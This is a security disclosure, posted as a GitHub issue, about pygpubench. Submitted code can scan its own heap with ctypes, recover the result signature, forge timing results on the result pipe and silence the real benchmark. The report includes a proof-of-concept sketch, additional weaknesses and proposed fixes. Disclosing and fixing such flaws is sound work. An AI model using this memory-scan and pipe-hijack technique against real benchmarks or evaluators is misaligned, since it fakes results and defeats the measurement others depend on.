-
Notifications
You must be signed in to change notification settings - Fork 5
Description
Summary
pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.
This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.
Severity
Critical — full benchmark integrity failure for any problem using do_bench_isolated.
Affected Component
pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.
Root Cause
The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.
Why existing defenses don't prevent this
| Defense | Why it doesn't help |
|---|---|
PR_SET_DUMPABLE=0 |
Prevents other processes from reading /proc/PID/mem. Does not affect the process reading its own /proc/self/maps (inode mode S_IRUGO = 0444, world-readable). Does not affect ctypes memory access (direct pointer dereference, no filesystem I/O). |
| Landlock | Allows read-only access to / (covers procfs). Allows read-write access to /dev (needed for /dev/null redirect). Does not restrict ctypes or os.write to inherited pipe fds. |
PR_SET_NO_NEW_PRIVS |
Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop | Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization | Irrelevant — the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely. |
The attack chain
Parent Child (subprocess)
────── ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────────► C++ reads sig_r → mSignature (heap)
C++ calls setup_benchmark()
C++ installs landlock
C++ calls kernel_from_qualname()
└─► import submission ◄──── ATTACKER CODE RUNS HERE
├─ gc.get_objects() → count tuples → repeats
├─ open("/proc/self/maps") → heap regions
├─ ctypes.string_at(heap) → signature
├─ os.fstat(0..255) → pipe fd
├─ os.write(pipe_fd, forged_results + signature)
├─ os.dup2(/dev/null, pipe_fd)
└─ define correct kernel()
C++ benchmark loop runs (writes go to /dev/null)
process exits with code 0
reads pipe → forged data ◄────────────
validates signature → PASS
accepts forged times (0.42 µs)
Proof of Concept
File: submission_memscan_signature.py
The PoC runs entirely at import time (before the C++ benchmark loop executes):
# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
for obj in gc.get_objects():
if isinstance(obj, tuple) and len(obj) == 3:
a, b, c = obj
if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
expected_count += 1
repeats = expected_count - 1 # subtract warmup slot
# Step 2: Read /proc/self/maps, scan heap for 32-char hex string
with open('/proc/self/maps') as f:
for line in f:
start, end = parse_address_range(line)
data = ctypes.string_at(start, end - start)
for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
candidates.append(match.group(1).decode())
# Step 3: Find pipe fd
for fd in range(256):
if stat.S_ISFIFO(os.fstat(fd).st_mode):
pipe_fds.append(fd)
# Step 4: Write forged results with extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
payload += f"{i}\t0.42\n" # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())
# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)
# Step 6: Correct kernel so process exits cleanly (exit code 0)
def kernel(output, inp):
torch.sum(inp * weights, dim=-1, out=output)Running the PoC
cd pygpubench/exploits
python run_all.py submission_memscan_signatureExpected output: CHEAT SUCCEEDED (bypassed detection) — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.
Prerequisites
- Linux (for
/proc/self/mapsand landlock) - CUDA GPU (for torch tensor operations)
- pygpubench installed (
pip install pygpubench)
Additional Findings
GC metadata leakage (HIGH)
At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:
- Exact
repeatsvalue — needed to construct correctly-sized forged results - Output tensor shapes and dtypes — useful for other exploit strategies
- Tolerance values — useful for crafting outputs that barely pass
The signature exploit depends on this to know how many iteration results to forge.
Source: csrc/manager.cpp:143-166 — setup_benchmark stores tuples in vectors that persist through do_bench_py.
Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.
Warmup detection (MEDIUM)
The warmup phase always uses args.at(0) (csrc/manager.cpp:301-324). The kernel can detect warmup by tracking input.data_ptr() (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate time_estimate, reducing actual_calls to the minimum of 3.
Fix: Randomize which test case is used for warmup.
NaN wildcard in checker (LOW, latent)
csrc/check.cu:44-46 treats NaN in expected output as a wildcard:
if (isnan(a))
return; // accepts ANY received valueCurrently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.
Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.
ctypes CUDA runtime access (LOW, latent)
The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.
Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.
Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.
Recommended Fixes
For the signature bypass (critical)
Option A: HMAC-based authentication (minimal change)
- At C++ init time (before any user code), read 32 bytes from
/dev/urandominto a local C++ variable - Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
- After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
- Append the HMAC tag to the pipe output
- Overwrite the key in memory (
memset_explicit) before importing the kernel - The parent recomputes the HMAC and rejects mismatches
Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
Option B: Separate validator process (stronger)
Run the benchmark in a three-process architecture:
- Orchestrator (trusted): generates test cases, owns the result pipe
- Worker (untrusted): runs the kernel, writes raw timing events to a pipe
- Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs
The worker never sees expected outputs or authentication keys.
For GC metadata leakage
// In do_bench_py, after copying expected outputs:
expected.clear(); // release Python tuple references
trigger_gc(); // clean up
// THEN import the kernelFor warmup detection
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls);
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmupFor NaN wildcard
// In check_approx_match_kernel:
if (isnan(a)) {
++res; // NaN in expected = test bug, not wildcard
return;
}What pygpubench Gets Right
Despite this finding, pygpubench is a massive improvement over the original evaluator:
| Attack class | Original evaluator | pygpubench |
|---|---|---|
__code__ patching |
Trivially exploitable | Fully blocked (C++ implementation) |
torch.cuda.Event patching |
Trivially exploitable | Fully blocked (C CUDA API) |
| GC NaN injection on expected outputs | N/A (no protection) | Blocked (cudaMalloc copy + zeroing) |
| GC answer copy | N/A (no protection) | Blocked (expected data zeroed) |
| Stream-based timing manipulation | N/A (no protection) | Blocked (programmatic stream serialization + randomized block checking) |
| Filesystem tampering | N/A (no sandboxing) | Blocked (landlock) |
| Error counter manipulation | N/A (no counter) | Effectively blocked (random offset + shift) |
| Input caching | N/A (no protection) | Blocked (shadow args + canaries + L2 clear) |
The old Class 1 (__code__ patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-03-07 | Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 | GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 | pygpubench security review conducted; signature bypass identified |
| 2026-03-07 | This report and PoC prepared |
Files
| File | Description |
|---|---|
| submission_memscan_signature.py | PoC exploit: memory scan + pipe hijack |
| This document | Full security audit and disclosure |